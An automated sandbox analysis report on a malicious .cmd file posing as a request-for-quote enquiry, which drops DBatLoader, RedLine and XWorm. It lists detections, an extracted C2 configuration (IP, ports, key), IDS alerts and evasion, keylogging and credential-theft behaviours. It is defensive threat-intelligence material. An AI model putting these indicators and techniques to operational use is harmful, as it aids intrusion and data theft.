Windows Analysis Report
RFQ_HB648836_Enquiry.cmd

Overview

General Information

Sample name:	RFQ_HB648836_Enquiry.cmd
Analysis ID:	1636703
MD5:	22c00ccdbab18812616ca11596d01bad
SHA1:	1bb64a238aadeab6dd86231121b60d3d4ee086d5
SHA256:	66b2852e9c3b6f98df012b7812ad72e13f234a54b4c1ad7c42258b6e62b632bd
Tags:	cmduser-qoos
Infos:

Detection

DBatLoader, PureLog Stealer, RedLine, XWorm

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DBatLoader

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Connects to many ports of the same IP (likely port scanning)

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Creates multiple autostart registry keys

Drops PE files with a suspicious file extension

Installs a global keyboard hook

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses process hollowing technique

Sample uses string decryption to hide its real strings

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Powershell Defender Exclusion

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://cyber.wtf/2025/02/12/unpacking-pyarmor-v8-scripts/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Signatures

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\Links\Rwelpqci.PIF	Avira: detection malicious, Label: HEUR/AGEN.1326111
Source: C:\Users\user\AppData\Local\Temp\x.exe	Avira: detection malicious, Label: HEUR/AGEN.1326111

Found malware configuration

Source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["204.10.161.147"], "Port": 7081, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\x.exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\Links\Rwelpqci.PIF	ReversingLabs: Detection: 18%

Multi AV Scanner detection for submitted file

Source: RFQ_HB648836_Enquiry.cmd	ReversingLabs: Detection: 26%
Source: RFQ_HB648836_Enquiry.cmd	Virustotal: Detection: 14%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 204.10.161.147
Source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 7081
Source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <123456789>
Source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <Xwormmm>
Source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: XWorm V5.6
Source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: USB.exe
Source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: %AppData%
Source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp	String decryptor: XClient.exe

Source:	Binary string: easinvoker.pdb source: x.exe, 00000003.00000003.1204278625.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1257831764.0000000021C30000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: icqplewR.pif, 00000009.00000003.1225845544.00000000202BA000.00000004.00000020.00020000.00000000.sdmp, icqplewR.pif, 00000014.00000003.1351645830.000000001B19F000.00000004.00000020.00020000.00000000.sdmp, icqplewR.pif, 00000014.00000002.1439549690.000000001E045000.00000004.00000800.00020000.00000000.sdmp, icqplewR.pif, 00000014.00000003.1381377846.000000001B1BB000.00000004.00000020.00020000.00000000.sdmp, icqplewR.pif, 00000014.00000002.1438171646.000000001CCDE000.00000004.00000020.00020000.00000000.sdmp, icqplewR.pif, 00000014.00000002.1438299753.000000001CE90000.00000004.08000000.00040000.00000000.sdmp, icqplewR.pif, 00000014.00000002.1436995878.000000001B1BB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: x.exe, 00000003.00000003.1205441850.0000000001FA9000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1204278625.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1257831764.0000000021C30000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1205441850.0000000001F7A000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F552F8 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	3_2_03F552F8
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 28_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,	28_2_0040128D
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 28_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,	28_2_00401612
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 29_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,	29_2_0040128D
Source: C:\Users\user\AppData\Roaming\XClient.exe	Code function: 29_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,	29_2_00401612

Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Windows\SysWOW64\avicap32.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Windows\SysWOW64\MSVFW32.dll	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Windows\SysWOW64\en-US\MSVFW32.dll.mui	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Windows\SysWOW64\en-US\avicap32.dll.mui	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Windows\SysWOW64\wbem\en-US\wmiutils.dll.mui	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 204.10.161.147:7081 -> 192.168.2.4:49721
Source: Network traffic	Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 204.10.161.147:7081 -> 192.168.2.4:49721
Source: Network traffic	Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.4:49723 -> 204.10.161.147:7082
Source: Network traffic	Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.4:49723 -> 204.10.161.147:7082
Source: Network traffic	Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 204.10.161.147:7082 -> 192.168.2.4:49723
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 204.10.161.147:7082 -> 192.168.2.4:49723
Source: Network traffic	Suricata IDS: 2036752 - Severity 1 - ET MALWARE Suspected BPFDoor TCP Magic Packet (Inbound) : 204.10.161.147:7081 -> 192.168.2.4:49721
Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49721 -> 204.10.161.147:7081
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49721 -> 204.10.161.147:7081

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 204.10.161.147

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 204.10.161.147 ports 7082,7081,0,1,7,8

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49721 -> 204.10.161.147:7081

Source: powershell.exe, 00000010.00000002.1339433556.0000000006CA9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1442995880.0000000007A11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: powershell.exe, 00000018.00000002.1518126299.000000000774C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.miG
Source: powershell.exe, 00000010.00000002.1352671283.0000000007DA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000018.00000002.1522934318.0000000008558000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microG?
Source: powershell.exe, 00000016.00000002.1446821632.00000000088CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000010.00000002.1331149342.000000000541F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1436029888.000000000600F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1502844796.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1570453475.000000000616B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001A.00000002.1545733791.0000000005257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000010.00000002.1322465182.0000000004507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1410483597.00000000050F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1475392680.0000000004D46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1545733791.0000000005257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000010.00000002.1322465182.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1410483597.0000000004FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1475392680.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1545733791.0000000005101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000010.00000002.1322465182.0000000004507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1410483597.00000000050F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1475392680.0000000004D46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1545733791.0000000005257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000001A.00000002.1545733791.0000000005257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: icqplewR.pif, 00000009.00000003.1767726638.0000000028F41000.00000004.00000800.00020000.00000000.sdmp, icqplewR.pif, 00000009.00000003.1696446755.0000000028F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.codeproject.com/Articles/16009/A-Much-Easier-to-Use-ListView
Source: XClient.exe, XClient.exe, 0000001D.00000000.1798098276.0000000000416000.00000002.00000001.01000000.0000000E.sdmp, XClient.exe, 0000001D.00000002.1798764081.0000000000416000.00000002.00000001.01000000.0000000E.sdmp, XClient.exe.9.dr, icqplewR.pif.3.dr	String found in binary or memory: http://www.pmail.com
Source: powershell.exe, 00000010.00000002.1322465182.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1410483597.0000000004FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1475392680.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1545733791.0000000005101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000001A.00000002.1570453475.000000000616B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001A.00000002.1570453475.000000000616B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001A.00000002.1570453475.000000000616B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001A.00000002.1545733791.0000000005257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000010.00000002.1331149342.000000000541F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1436029888.000000000600F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1502844796.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1570453475.000000000616B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 20.2.icqplewR.pif.1cee0000.7.raw.unpack, XLogger.cs

.Net Code: KeyboardLayout

Installs a global keyboard hook

Source: C:\Users\user\Links\icqplewR.pif

Windows user hook set: 0 keyboard low level C:\Users\user\Links\icqplewR.pif

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 20.1.icqplewR.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.1.icqplewR.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 20.1.icqplewR.pif.4d88c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 20.1.icqplewR.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.1.icqplewR.pif.436038.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 20.2.icqplewR.pif.436038.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 19.2.Rwelpqci.PIF.226cc348.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.1.icqplewR.pif.436038.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.x.exe.229aebd8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 20.2.icqplewR.pif.4d88c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 20.2.icqplewR.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.1.icqplewR.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 20.2.icqplewR.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.1.icqplewR.pif.467468.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.x.exe.2297d7a8.6.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.x.exe.2297d7a8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 20.1.icqplewR.pif.436038.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000014.00000001.1347456184.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000009.00000001.1214724739.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000014.00000002.1417837790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F63380 NtWriteVirtualMemory,	3_2_03F63380
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F6421C GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	3_2_03F6421C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F63034 NtAllocateVirtualMemory,	3_2_03F63034
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F69738 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	3_2_03F69738
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F69654 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	3_2_03F69654
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F695CC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	3_2_03F695CC
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F63B44 NtUnmapViewOfSection,	3_2_03F63B44
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F638D4 NtReadVirtualMemory,	3_2_03F638D4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F6421A GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	3_2_03F6421A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F63032 NtAllocateVirtualMemory,	3_2_03F63032
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F69578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	3_2_03F69578
Source: C:\Users\user\Links\Rwelpqci.PIF	Code function: 19_2_04089738 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	19_2_04089738
Source: C:\Users\user\Links\Rwelpqci.PIF	Code function: 19_2_04083034 NtAllocateVirtualMemory,	19_2_04083034
Source: C:\Users\user\Links\Rwelpqci.PIF	Code function: 19_2_040838D4 NtReadVirtualMemory,	19_2_040838D4
Source: C:\Users\user\Links\Rwelpqci.PIF	Code function: 19_2_0408421C GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	19_2_0408421C
Source: C:\Users\user\Links\Rwelpqci.PIF	Code function: 19_2_04083B44 NtUnmapViewOfSection,	19_2_04083B44
Source: C:\Users\user\Links\Rwelpqci.PIF	Code function: 19_2_04083380 NtWriteVirtualMemory,	19_2_04083380
Source: C:\Users\user\Links\Rwelpqci.PIF	Code function: 19_2_0408341B NtWriteVirtualMemory,	19_2_0408341B
Source: C:\Users\user\Links\Rwelpqci.PIF	Code function: 19_2_04089578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	19_2_04089578
Source: C:\Users\user\Links\Rwelpqci.PIF	Code function: 19_2_040895CC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	19_2_040895CC
Source: C:\Users\user\Links\Rwelpqci.PIF	Code function: 19_2_04089654 RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,	19_2_04089654
Source: C:\Users\user\Links\Rwelpqci.PIF	Code function: 19_2_04089809 NtQueryInformationFile,NtReadFile,NtClose,	19_2_04089809
Source: C:\Users\user\Links\Rwelpqci.PIF	Code function: 19_2_04083032 NtAllocateVirtualMemory,	19_2_04083032
Source: C:\Users\user\Links\Rwelpqci.PIF	Code function: 19_2_0408396E NtReadVirtualMemory,	19_2_0408396E
Source: C:\Users\user\Links\Rwelpqci.PIF	Code function: 19_2_0408421A GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	19_2_0408421A

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_03F6A634 InetIsOffline,Sleep,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,

3_2_03F6A634

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_03F520B4	3_2_03F520B4
Source: C:\Users\user\Links\icqplewR.pif	Code function: 9_1_00408C60	9_1_00408C60
Source: C:\Users\user\Links\icqplewR.pif	Code function: 9_1_0040DC11	9_1_0040DC11
Source: C:\Users\user\Links\icqplewR.pif	Code function: 9_1_00407C3F	9_1_00407C3F
Source: C:\Users\user\Links\icqplewR.pif	Code function: 9_1_00418CCC	9_1_00418CCC
Source: C:\Users\user\Links\icqplewR.pif	Code function: 9_1_00406CA0	9_1_00406CA0
Source: C:\Users\user\Links\icqplewR.pif	Code function: 9_1_004028B0	9_1_004028B0
Source: C:\Users\user\Links\icqplewR.pif	Code function: 9_1_0041A4BE	9_1_0041A4BE
Source: C:\Users\user\Links\icqplewR.pif	Code function: 9_1_00418244	9_1_00418244
Source: C:\Users\user\Links\icqplewR.pif	Code function: 9_1_00401650	9_1_00401650
Source: C:\Users\user\Links\icqplewR.pif	Code function: 9_1_00402F20	9_1_00402F20
Source: C:\Users\user\Links\icqplewR.pif	Code function: 9_1_004193C4	9_1_004193C4
Source: C:\Users\user\Links\icqplewR.pif	Code function: 9_1_00418788	9_1_00418788
Source: C:\Users\user\Links\icqplewR.pif	Code function: 9_1_00402F89	9_1_00402F89
Source: C:\Users\user\Links\icqplewR.pif	Code function: 9_1_00402B90	9_1_00402B90
Source: C:\Users\user\Links\icqplewR.pif	Code function: 9_1_004073A0	9_1_004073A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00DDB490	16_2_00DDB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00DDB48B	16_2_00DDB48B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_08233EA8	16_2_08233EA8
Source: C:\Users\user\Links\Rwelpqci.PIF	Code function: 19_2_040720B4	19_2_040720B4
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_2_00408C60	20_2_00408C60
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_2_0040DC11	20_2_0040DC11
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_2_00407C3F	20_2_00407C3F
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_2_00418CCC	20_2_00418CCC
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_2_00406CA0	20_2_00406CA0
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_2_004028B0	20_2_004028B0
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_2_0041A4BE	20_2_0041A4BE
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_2_00418244	20_2_00418244
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_2_00401650	20_2_00401650
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_2_00402F20	20_2_00402F20
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_2_004193C4	20_2_004193C4
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_2_00418788	20_2_00418788
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_2_00402F89	20_2_00402F89
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_2_00402B90	20_2_00402B90
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_2_004073A0	20_2_004073A0
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_2_1CC21030	20_2_1CC21030
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_1_00408C60	20_1_00408C60
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_1_0040DC11	20_1_0040DC11
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_1_00407C3F	20_1_00407C3F
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_1_00418CCC	20_1_00418CCC
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_1_00406CA0	20_1_00406CA0
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_1_004028B0	20_1_004028B0
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_1_0041A4BE	20_1_0041A4BE
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_1_00418244	20_1_00418244
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_1_00401650	20_1_00401650
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_1_00402F20	20_1_00402F20
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_1_004193C4	20_1_004193C4
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_1_00418788	20_1_00418788
Source: C:\Users\user\Links\icqplewR.pif	Code function: 20_1_00402F89	20_1_00402F89
